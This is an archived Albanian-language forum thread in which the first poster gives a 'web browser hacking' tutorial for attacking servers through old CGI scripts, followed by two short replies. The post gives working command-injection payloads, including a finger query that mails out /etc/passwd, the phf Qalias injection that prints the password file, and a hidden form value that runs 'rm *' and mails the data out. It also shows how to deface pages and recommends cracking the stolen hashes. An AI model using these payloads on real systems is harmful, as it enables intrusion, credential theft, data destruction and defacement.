PDA

View Full Version : Web Browser Hacking


BERLINERBOY
16-03-04, 01:12
:evil: :evil: Ka disa teknika qe une i quaj "WEB BROWSER HACKING". Shume fillestare e dijne qe nuk mund te hapin folderin etc/passwd te nje serveri nepermjet browserit te pc tuaj, por une do ju
tregoj si te kopjoni nje file passwd po ne kete menyre.

Metoda e meposhte pershkruhet per hackerin e ri dhe mbulon PHF si direktori, por mund te

eksplorohet (nga ata pak me profesioniste) i gjithe cgi duke futur ketu nph-test-cgi apo

test-cgi. Tani... rehatohuni...mbeshtetuni dhe...lexoni!
Gjeja e pare eshte gjetja e nje viktime, nje terminali qe perdor cgi-bin/phf. Kjo mund te

behet me njekerkim ne Altavista.com. Kerkoni cgi-bin AND perl.exe ose cgi-bin AND phf.

a) Hacking me Finger
Te themi qe ju doni te futeni diku,
p.sh... AOL!!! Pas kesaj url-je do shtoni cgi-bin/finger. Nqs ky sherbim do jete funksional

do ju kerkohet e mri per t'u fingeruar. Ajo per te cilen do keni nevoje me pas eshte gjetja

e nje maileri ne faqe.
kethehuni tek faqja e finger dhe shkruani:

nobody@nowhere.org ;/bin/mail ju@emailijuaj.com
Kjo do ju dergopje ne emailin tuaj te gjithe filen passwd dhe ju pastaj me nge do mund bte

perdorni nje program si john.exe per ta crackuar.

b) Kerkese e zakonshme per cgi_bin/phf
Maeerin te njejtin skanar. Do shfaqern nje sere searchboxesh ne
www.aol.com/cgi-bin/phf.
(n.q.s nuk i kane hequr).
Kesaj Url-je shtojini
?Qalias=x%0a/bin/cat%20/etc/passwd.
Kjo do shfaqe ne browserin tuaj filen passwd te kriptuar qe ju duhet pestaj te krackoni (

n.q.s nuk jane te gjitha "*" ose "x").
c)Me scripte Cgi (mos merrni timin)

html>
h2>This is a form to go to Modify
form action = "http://www.aol.com/cgi-bin/doc.pl" method="get".>
input type="hidden" name="adresaime" value="askush@aol.com".>
input type="text" name="input".>
input type="submit" value="send".>
/form.>
/body.>

Ky eshte nje formular ishjeshte qe kerkon nje mesazh per t'u derguar ne doc.pl. Ne doc.pl

si script duhet te figuroje shkrimi

sustem("/usr/lib/sendmail -t $adresaime
$tempfile")
Tani te bejme faqen tuaj.

html.>
h2.>Hack AOL
form action = "http://www.aol.com/cgi-bin/doc.pl" method = "get".>
input type="hidden" name="adresaime"
value=" ; rm * ;mail -s file adresajuaj@ispjuaj.com
input type = "text" name="input".>
input type = "submit" value=:"getpasswd".>
/form.>

Pikepresjet tek vlerat e fshehura sherbejne si ndarje per komandat Unix qe zbatohen ne te

njejtin rresht. Sistemi therret perl.exe qe krijon nje shell Unix duke ju derguar juve ne

emailin tuaj filen passwd.

d) Editim faqesh nga browseri juaj
Ky fragment tregon se si te beni editimin e nje faqeje html cfaredo
I njejti skenar:

www.aol.com/cgi-bin/phf?Qalias=x%0a/bin/echo%20 "albhack.com"%20>>emerfile.com.html
Ne faqen nqe juzgjodhet kjo do shkruaje ALBHACK apo nje text tjeter te shenuar nga ju.

Autori nuk mban pergjegjesi per asnje lloj perdorimi te ketij materiali qe u paraqit per

qellime teresisht informative.

Lola
10-05-04, 12:00
:!: :?: IM AM LOLA_%%!

Cool_Boy
10-05-04, 13:22
Shokit a ka mundesi me na trefu processin se si te hackeratemi dhe si te mbohemi nga ata?????????

tung,Cool_Boy